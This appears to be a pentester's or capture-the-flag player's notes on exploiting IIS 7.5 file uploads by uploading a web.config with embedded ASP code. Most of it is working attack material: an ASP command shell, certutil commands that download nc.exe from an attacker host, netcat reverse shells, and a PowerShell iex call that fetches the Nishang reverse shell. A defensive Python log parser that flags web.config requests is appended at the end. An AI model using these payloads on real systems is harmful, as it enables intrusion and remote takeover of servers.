80 http Microsoft IIS httpd 7.5
IIS 7.5 ships with Windows Server 2008 R2
IIS Uploads
If you can upload files to an IIS site, keep trying uploads to find out which extensions are accepted:
test.txt ..fail
test.asp ..fail
test.aspx ..fail
test.jpg ..ok
web.config ..ok - exploitable
RCE via web.config upload
Older IIS 7.5 setups that accept file uploads
We upload our own 'web.config' with the malicious ASP code appended at the bottom
REF:
-------------------------------
vi web.config ..malicious ASP code at the bottom
Response.write(1+2) ..test: the page should render 3
-------------------------------
cat /opt/shells/web.aspx
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config
-------------------------------
Catch the ping (did my command run?)
tcpdump -i tun0 icmp
Easy
-----------------------
We will use the web.config exploit
The first web.config downloads nc:
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")
The second web.config runs nc as a reverse shell:
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo
-----------------------
google iis rce upload
Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it:
Prep:
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
Serve it with Python's HTTP server (as above)
<%@ Language=VBScript %>
<%
call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>
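Defender-side example, added here and not part of these notes or of 0xdf's writeup: a small IIS W3C log parser that flags requests for web.config. IIS request filtering normally hides web.config (404.8), so a 200 on a web.config path under an upload directory is the signature of the technique above; the log lines, hostnames and addresses are constructed.

```python
from typing import Dict, List

# Constructed IIS W3C log excerpt (not real traffic): a benign page hit, an
# upload POST, then the uploaded web.config being requested and executed.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-01 10:00:01 10.0.0.5 GET /index.asp - 80 - 10.0.0.9 Mozilla/5.0 200 0 0 15
2024-01-01 10:00:07 10.0.0.5 POST /transfer.aspx - 80 - 10.0.0.9 Mozilla/5.0 200 0 0 120
2024-01-01 10:00:09 10.0.0.5 GET /UploadedFiles/test.jpg - 80 - 10.0.0.9 Mozilla/5.0 200 0 0 3
2024-01-01 10:00:31 10.0.0.5 GET /UploadedFiles/web.config - 80 - 10.0.0.9 Mozilla/5.0 200 0 0 410
2024-01-01 10:00:40 10.0.0.5 GET /web.config - 80 - 10.0.0.9 Mozilla/5.0 404 8 0 1
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # field names follow the directive
            continue
        if not line or line.startswith("#"):
            continue  # blank line or another directive (#Software, #Date, ...)
        values = line.split()  # W3C encodes embedded spaces as '+', so split is safe
        if len(values) == len(fields):
            records.append(dict(zip(fields, values)))
    return records


def find_web_config_hits(records: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag every request whose URI stem is a web.config file, graded by status.
    404.8 ("Hidden namespace") is the expected request-filtering block; a 200
    means the file was served or executed, i.e. a per-directory web.config has
    overridden the handler mapping, which is what the upload technique relies on."""
    hits = []
    for r in records:
        if not r.get("cs-uri-stem", "").lower().endswith("/web.config"):
            continue
        status = (r.get("sc-status", ""), r.get("sc-substatus", ""))
        if status[0] == "200":
            severity, reason = "high", "web.config served with 200: request filtering bypassed"
        elif status == ("404", "8"):
            severity, reason = "low", "blocked by hidden-segment filtering (expected)"
        else:
            severity, reason = "medium", "unexpected status %s.%s on web.config" % status
        hits.append({"time": r["date"] + " " + r["time"], "client": r.get("c-ip", ""),
                     "path": r["cs-uri-stem"], "severity": severity, "reason": reason})
    return hits


if __name__ == "__main__":
    for h in find_web_config_hits(parse_w3c(SAMPLE_LOG)):
        print("%(severity)s %(time)s %(client)s %(path)s: %(reason)s" % h)
```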